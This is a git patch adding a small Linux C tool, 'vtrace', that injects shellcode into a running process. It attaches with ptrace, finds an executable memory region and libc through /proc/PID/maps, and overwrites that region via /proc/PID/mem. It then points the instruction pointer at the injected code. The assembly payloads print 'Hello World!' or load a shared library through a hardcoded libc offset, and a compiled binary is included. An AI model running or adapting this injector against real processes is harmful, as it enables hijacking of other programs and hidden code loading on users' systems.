From e675b26311d3890d6859a65f16706374550b6145 Mon Sep 17 00:00:00 2001
From: mykola2312 <49044616+mykola2312@users.noreply.github.com>
Date: Mon, 10 Apr 2017 01:39:49 +0300
Subject: [PATCH] Initial commit

---
 proc.c                   |  89 ++++++++++++++++++++++++++++++
 proc.h                   |  26 +++++++++
 shellcode/vm_hello.bin   |   1 +
 shellcode/vm_hello.s     |  19 +++++++
 shellcode/vm_hello32.bin |   2 +
 shellcode/vm_hello32.s   |  20 +++++++
 shellcode/vm_load.bin    | Bin 0 -> 59 bytes
 shellcode/vm_load.s      |  17 ++++++
 shellcode/vm_load32.bin  | Bin 0 -> 56 bytes
 shellcode/vm_load32.s    |  17 ++++++
 vmap.c                   |  60 +++++++++++++++++++++
 vmap.h                   |  41 ++++++++++++++
 vtrace                   | Bin 0 -> 14252 bytes
 vtrace.c                 | 113 +++++++++++++++++++++++++++++++++++++++
 14 files changed, 405 insertions(+)
 create mode 100644 proc.c
 create mode 100644 proc.h
 create mode 100644 shellcode/vm_hello.bin
 create mode 100644 shellcode/vm_hello.s
 create mode 100644 shellcode/vm_hello32.bin
 create mode 100644 shellcode/vm_hello32.s
 create mode 100644 shellcode/vm_load.bin
 create mode 100644 shellcode/vm_load.s
 create mode 100644 shellcode/vm_load32.bin
 create mode 100644 shellcode/vm_load32.s
 create mode 100644 vmap.c
 create mode 100644 vmap.h
 create mode 100644 vtrace
 create mode 100644 vtrace.c

diff --git a/proc.c b/proc.c
new file mode 100644
index 0000000..4411114
--- /dev/null
+++ b/proc.c
@@ -0,0 +1,89 @@
+#include "proc.h"
+
+int is_numeric(char* s)
+{
+	while(*s)
+	{
+		if(!isdigit(*s))
+			return 0;
+		s++;
+	}
+	return 1;
+}
+
+int walk_proc(walk_proc_callback func,void *data)
+{
+	struct dirent* dr;
+	DIR* d;
+	if(!(d = opendir("/proc")))
+		return -1;
+	while((dr = readdir(d)))
+	{
+		if(dr->d_type == DT_DIR)
+		{
+			if(is_numeric(dr->d_name))
+			{	
+				if(func(atoi(dr->d_name),data))
+					return 1;
+			}
+		}
+	}
+	closedir(d);
+	return 0;
+}
+
+int walk_thread(pid_t pid,walk_thread_callback func,void *data)
+{
+	struct dirent* dr;
+	DIR* d;
+	char path[256];
+	sprintf(path,"/proc/%d/task",pid);
+	if(!(d = opendir(path)))
+		return -1;
+	while((dr = readdir(d)))
+	{
+		if(dr->d_type == DT_DIR)
+		{
+			if(is_numeric(dr->d_name)==1)
+			{
+				if(func(atoi(dr->d_name),data))
+					return 1;
+			}
+		}
+	}
+	closedir(d);
+	return 0;
+}
+
+int suspend_proc_callback(pid_t tid,void *data)
+{
+	int status;
+	if(*(bool*)data == true)
+	{
+		ptrace(PTRACE_ATTACH,tid,0,0);
+		waitpid(tid,&status,0);
+	}
+	else
+	{
+		ptrace(PTRACE_DETACH,tid,0,0);
+		waitpid(tid,&status,0);
+	}
+	return 0;
+}
+
+int suspend_proc(pid_t pid,bool suspend)
+{
+	return walk_thread(pid,&suspend_proc_callback,(void*)&suspend);
+}
+
+int open_proc(pid_t pid)
+{
+	char path[256];
+	sprintf(path,"/proc/%d/mem",pid);
+	return open(path,O_RDWR);
+}
+
+void close_proc(int pd)
+{
+	close(pd);
+}
diff --git a/proc.h b/proc.h
new file mode 100644
index 0000000..4f6359d
--- /dev/null
+++ b/proc.h
@@ -0,0 +1,26 @@
+#ifndef __PROC_H
+#define __PROC_H
+
+#include <ctype.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <string.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include <dirent.h>
+#include <fcntl.h>
+
+typedef int (*walk_proc_callback)(int pid,void *data);
+typedef int (*walk_thread_callback)(pid_t tid,void *data);
+
+int walk_proc(walk_proc_callback func,void *data);
+int walk_thread(pid_t pid,walk_thread_callback func,void *data);
+
+int suspend_proc(pid_t pid,bool suspend);
+
+int open_proc(pid_t pid);
+void close_proc(int pd);
+
+#endif
diff --git a/shellcode/vm_hello.bin b/shellcode/vm_hello.bin
new file mode 100644
index 0000000..cc802e7
--- /dev/null
+++ b/shellcode/vm_hello.bin
@@ -0,0 +1 @@
+ë^H1ÀH1ÒHÿÀH‰Ç²
[ÃèèÿÿÿHello World!
diff --git a/shellcode/vm_hello.s b/shellcode/vm_hello.s
new file mode 100644
index 0000000..0b027f2
--- /dev/null
+++ b/shellcode/vm_hello.s
@@ -0,0 +1,19 @@
+use64
+
+jmp _text
+_code:
+pop rsi
+
+xor rax,rax
+xor rdx,rdx
+inc rax
+mov rdi,rax
+mov dl,13
+syscall
+
+pop rbx
+ret
+
+_text:
+call _code
+db "Hello World!",0x0A
diff --git a/shellcode/vm_hello32.bin b/shellcode/vm_hello32.bin
new file mode 100644
index 0000000..988874c
--- /dev/null
+++ b/shellcode/vm_hello32.bin
@@ -0,0 +1,2 @@
+1À1Û1Òë
+Y°²
CÍ€[ÃèñÿÿÿHello World!
diff --git a/shellcode/vm_hello32.s b/shellcode/vm_hello32.s
new file mode 100644
index 0000000..7f458a6
--- /dev/null
+++ b/shellcode/vm_hello32.s
@@ -0,0 +1,20 @@
+use32
+
+xor eax,eax
+xor ebx,ebx
+xor edx,edx
+jmp _text
+_code:
+pop ecx
+
+mov al,4
+mov dl,13
+inc ebx
+int 0x80
+
+pop ebx
+ret
+
+_text:
+call _code
+db "Hello World!",0x0A
diff --git a/shellcode/vm_load.bin b/shellcode/vm_load.bin
new file mode 100644
index 0000000000000000000000000000000000000000..4d3b07bd4d180ce5fd54b5ac3ac82f9ce721f91a
GIT binary patch
literal 59
zcmaDY6z^g9&Ex+ukKSg5U?GP87orcpc=`YTfBlU7+*JL<l%mYUyj1<-%3_m(qWon2
PoXn(>)Z!Ao;(P`GYK9v4

literal 0
HcmV?d00001

diff --git a/shellcode/vm_load.s b/shellcode/vm_load.s
new file mode 100644
index 0000000..b5be359
--- /dev/null
+++ b/shellcode/vm_load.s
@@ -0,0 +1,17 @@
+use64
+
+jmp _text
+_code:
+pop rdi
+
+xor rsi,rsi
+inc rsi
+lea rax,[rbx+0x125320]
+call rax
+
+pop rbx
+ret
+
+_text:
+call _code
+db "/home/adriane/sys4proc/libtest.so",0
diff --git a/shellcode/vm_load32.bin b/shellcode/vm_load32.bin
new file mode 100644
index 0000000000000000000000000000000000000000..354c2575b2bd2b3515aa8deb2d2d9801868b118f
GIT binary patch
literal 56
zcmc~|e9hb2JfT2{;s1r^BOK9(U%dPO|G$1ler~FMVoFhFVqU6#ab>YdK~a9Peokgm
MNosM4UU5DH0RM0q8~^|S

literal 0
HcmV?d00001

diff --git a/shellcode/vm_load32.s b/shellcode/vm_load32.s
new file mode 100644
index 0000000..a0df6e0
--- /dev/null
+++ b/shellcode/vm_load32.s
@@ -0,0 +1,17 @@
+use32
+;ebx+0x127090
+
+push 1
+jmp _text
+_code:
+
+lea eax,[ebx+0x127090]
+call eax
+add esp,8
+
+pop ebx
+ret
+
+_text:
+call _code
+db "/home/adriane/sys4proc/libtest.so",0
diff --git a/vmap.c b/vmap.c
new file mode 100644
index 0000000..2fb085c
--- /dev/null
+++ b/vmap.c
@@ -0,0 +1,60 @@
+#include "vmap.h"
+
+void vmap_parse(vmap_t* map,const char* str)
+{
+	sscanf(str,"%lx-%lx %s %08d %*02d:%*02d %*s %s",
+		&map->vm_start,&map->vm_end,map->perms,
+		&map->magic_num,map->path);
+}
+
+int vmap_walk(pid_t pid,walk_map_callback func,void *arg)
+{
+	char buf[256];
+	char path[64];
+	vmap_t map;
+	FILE* fmap;
+	
+	sprintf(path,"/proc/%d/maps",pid);
+	if(!(fmap = fopen(path,"rb")))
+		return -1;
+		
+	while(fgets(buf,256,fmap) != NULL)
+	{
+		vmap_parse(&map,buf);
+		if(func(&map,arg))
+			return 1;
+	}
+	return 0;
+}
+
+int walk_map_func(vmap_t *map,void *arg)
+{
+	vmap_request_t *vreq = (vmap_request_t*)arg;
+	vreq->status = VMAP_NOTFOUND;
+	if(vreq->type == VMAP_WALK_SHELL && strchr(map->perms,'x'))
+	{
+		vreq->status = VMAP_OK;
+		memcpy(vreq->map,map,sizeof(vmap_t));
+		return 1;
+	}
+	else if(vreq->type == VMAP_WALK_LIBC && strstr(map->path,"libc-"))
+	{
+		vreq->status = VMAP_OK;
+		memcpy(vreq->map,map,sizeof(vmap_t));
+		return 1;
+	}
+	return 0;
+}
+
+int vmap_reqeust(pid_t pid,request_t what,vmap_t *map)
+{
+	vmap_request_t vreq;
+	
+	vreq.type = what;
+	vreq.map = map;
+	vmap_walk(pid,&walk_map_func,(void*)&vreq);
+	if(vreq.status == VMAP_OK)
+		return 0;
+	
+	return -1;
+}
diff --git a/vmap.h b/vmap.h
new file mode 100644
index 0000000..f6e89f6
--- /dev/null
+++ b/vmap.h
@@ -0,0 +1,41 @@
+#ifndef __VMAP_H
+#define __VMAP_H
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+typedef enum {
+	VMAP_WALK_SHELL,
+	VMAP_WALK_LIBC,
+} request_t;
+
+typedef enum {
+	VMAP_OK,
+	VMAP_NOTFOUND,
+} status_t;
+
+typedef struct {
+	uintptr_t vm_start;
+	uintptr_t vm_end;
+	char perms[5];
+	uint32_t magic_num;
+	char path[256];
+} vmap_t;
+
+typedef struct {
+	request_t type;
+	status_t status;
+	vmap_t *map;
+} vmap_request_t;
+
+typedef int (*walk_map_callback)(vmap_t *map,void *arg);
+
+void vmap_parse(vmap_t* map,const char* str);
+int vmap_walk(pid_t pid,walk_map_callback func,void *arg);
+int vmap_reqeust(pid_t pid,request_t what,vmap_t *map);
+
+#endif
diff --git a/vtrace b/vtrace
new file mode 100644
index 0000000000000000000000000000000000000000..7cf74c5fdcaed6529aa46e2a045e140de9e6792c
GIT binary patch
literal 14252
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

literal 0
HcmV?d00001

diff --git a/vtrace.c b/vtrace.c
new file mode 100644
index 0000000..8e3274f
--- /dev/null
+++ b/vtrace.c
@@ -0,0 +1,113 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <malloc.h>
+#include <sys/ptrace.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <unistd.h>
+#include "proc.h"
+#include "vmap.h"
+
+void emu_push(pid_t pid,struct user_regs_struct *regs,
+	unsigned long value)
+{
+#ifdef __i386__
+	regs->esp -= sizeof(unsigned long);
+	if(ptrace(PTRACE_POKEDATA,pid,regs->esp,value) < 0)
+		perror("ptrace_pokedata");
+#elif __x86_64__
+	regs->rsp -= sizeof(unsigned long);
+	if(ptrace(PTRACE_POKEDATA,pid,regs->rsp,value) < 0)
+		perror("ptrace_pokedata");
+#endif
+}
+
+int main(int argc,char** argv)
+{
+	pid_t pid = atoi(argv[1]);
+	struct user_regs_struct regs;
+	struct stat st;
+	vmap_t shell,libc;
+	void* local_shell;
+	int fd,pd,wr;
+	
+	if(vmap_reqeust(pid,VMAP_WALK_SHELL,&shell) < 0)
+	{
+		fputs("[-] Place for shellcode not found!\n",stderr);
+		exit(0);
+	}
+	
+	if(vmap_reqeust(pid,VMAP_WALK_LIBC,&libc) < 0)
+	{
+		fputs("[-] Libc not found!\n",stderr);
+		exit(0);
+	}
+	
+	if((fd = open(argv[2],O_RDONLY)) < 0)
+	{
+		perror("open shellcode file");
+		exit(1);
+	}
+	
+	if(fstat(fd,&st))
+	{
+		perror("fstat");
+		close(fd);
+		exit(1);
+	}
+	
+	local_shell = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,fd,0);
+	if(local_shell == MAP_FAILED)
+	{
+		perror("mmap");
+		close(fd);
+		exit(1);
+	}
+	
+	suspend_proc(pid,true);
+	
+	if((pd = open_proc(pid)) < 0)
+	{
+		perror("open_proc");
+		suspend_proc(pid,false);
+		exit(1);
+	}
+	
+	printf("%lx-%lx\n",shell.vm_start,shell.vm_end);
+	
+	if((wr = pwrite(pd,(void*)local_shell,
+		st.st_size,(off_t)shell.vm_start)) < 0)
+	{
+		perror("pwrite");
+		goto ex;
+	}
+	else
+		printf("[+] Shellcode written %d\n",wr);
+	
+	ptrace(PTRACE_GETREGS,pid,0,&regs);
+#ifdef __i386__
+	emu_push(pid,&regs,regs.eip);
+	emu_push(pid,&regs,regs.ebx);
+	
+	regs.eip = (unsigned long)shell.vm_start+2;
+	regs.ebx = (unsigned long)libc.vm_start;
+#elif __x86_64__
+	emu_push(pid,&regs,regs.rip);
+	emu_push(pid,&regs,regs.rbx);
+	
+	regs.rip = (unsigned long)shell.vm_start+2;
+	regs.rbx = (unsigned long)libc.vm_start;
+#endif
+
+	ptrace(PTRACE_SETREGS,pid,0,&regs);
+ex:
+	suspend_proc(pid,false);
+	
+	munmap(local_shell,st.st_size);
+	close_proc(pd);
+	close(fd);
+	return 0;
+}